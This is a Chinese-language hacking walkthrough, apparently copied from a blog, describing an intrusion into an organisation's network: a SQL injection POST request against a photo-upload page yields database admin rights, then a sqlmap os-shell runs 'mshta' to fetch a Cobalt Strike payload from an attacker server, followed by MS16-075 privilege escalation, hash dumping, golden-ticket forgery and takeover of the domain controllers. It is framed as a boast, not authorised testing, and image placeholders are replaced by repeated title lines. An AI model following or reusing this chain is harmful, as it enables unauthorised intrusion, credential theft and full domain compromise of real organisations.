黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

首先我們發現目標站:www.xxxxx.xx

<code>脆弱點:http:

//www

.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp/<code>

SQL注入POST包:

<code>POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp 
HTTP/

1.1

Host: www.xxxxx.xxContent-Length:

31

Cache-Control: max-age=0Origin: http:

//www

.xxxxx.xxUpgrade-Insecure-Requests:

1

Content-Type: application/

x

-www-form-urlencodedUser-Agent: Mozilla/

5.0

(Windows NT

10.0

; Win64; x64) AppleWebKit/

537.36

(KHTML, like Gecko) Chrome/

80.0

.

3987.132

Safari/

537.36

Accept: text/html,application/xhtml+xml,application/xml;

q

=

0

.

9

,image/webp,image/apng,*

/*;q=0.8,application/signed

-exchange;v=b3;

q

=

0

.

9

Referer: http:

//www

.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;

q

=

0

.

9

Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBBConnection: closetxtSchoolYear=

108

B&txtStdID=

1234

/<code>


權限:DBA(SA)


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

內網橫向

CS設置好HTTPS監聽器,生成一個html application文件


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


然後傳到CS服務器上


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

sqlmap在os-shell下執行mshta http://20*.*.*.2*:80/download/file.txt


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

過一會有臺主機上線了

設置好beacon回連時間後檢查下服務器的環境


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


存在域


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


他這裡的補丁安裝的較多


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

<code>複製信息到

https

:/<code>


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


發現漏補MS16-075

<code>在github上找到了該

exp

的cna插件https:/<code>


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

clone回來加載到CS裡


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


獲取到了system權限的beacon


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


需要注意的是目前進程的父進程是mssql,需要注入到其他用戶的進程下,否則執行一些命令時會提示權限不夠


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


選擇了WEGO的用戶注入


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


查看域控


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

根據備註,判斷AD1為主域控,AD2、AD3為輔域控


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

抓下hash然後備用


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

接管域控

利用抓到的hash偽造金票


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

然後接管AD1


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

再從AD1上抓hash

黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作

在AD1上抓到了域管的明文密碼


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


然後批量梭哈


黑客入侵乾貨-大型服務器內網域控滲透,拿下多臺服務器的神操作


文章腳本收集,侵權刪


分享到:


相關文章: